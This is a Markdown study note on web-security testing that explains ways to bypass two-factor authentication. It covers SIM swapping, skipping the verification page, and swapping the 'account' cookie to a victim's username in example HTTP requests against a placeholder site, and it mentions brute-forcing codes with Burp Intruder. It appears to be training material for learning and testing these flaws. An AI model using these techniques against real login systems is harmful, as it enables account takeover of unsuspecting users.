56 lines
1.5 KiB
Markdown
56 lines
1.5 KiB
Markdown
|
|
## Multi-Factor Authentication
|
|
|
|
Two-Factor Authentication Tokens
|
|
- Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
|
|
- Other websites send a code via text message which is open to abuse
|
|
Code is being transmitted via SMS rather than by the device itself
|
|
Code can be intercepted via SIM swapping among other means
|
|
|
|
Bypassing Two-Factor Authentication
|
|
- Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic
|
|
|
|
1. User logs in with normal creds
|
|
```
|
|
POST /login-steps/first
|
|
HTTP/1.1
|
|
Host: vulnerable-website.com
|
|
...
|
|
username=carlos&password=qwerty
|
|
```
|
|
|
|
2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process
|
|
```
|
|
HTTP/1.1 200 OK
|
|
Set-Cookie: account=carlos
|
|
GET /login-steps/second
|
|
HTTP/1.1
|
|
Cookie: account=carlos
|
|
```
|
|
|
|
3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access
|
|
```
|
|
POST /login-steps/second
|
|
HTTP/1.1
|
|
Host: vulnerable-
|
|
website.com
|
|
Cookie: account=carlos
|
|
...
|
|
verification-code=123456
|
|
```
|
|
|
|
4. You can change the "account" cookie to any username when submitting the code
|
|
```
|
|
POST /login-steps/second
|
|
HTTP/1.1
|
|
Host: vulnerable-
|
|
website.com
|
|
Cookie: account=victim-user
|
|
...
|
|
verification-code=123456
|
|
```
|
|
|
|
|
|
Brute-forcing 2FA Verification Codes
|
|
- This can be automated by creating macros for Burp Intruder
|
|
- This can also be done with the Turbo Intruder extension |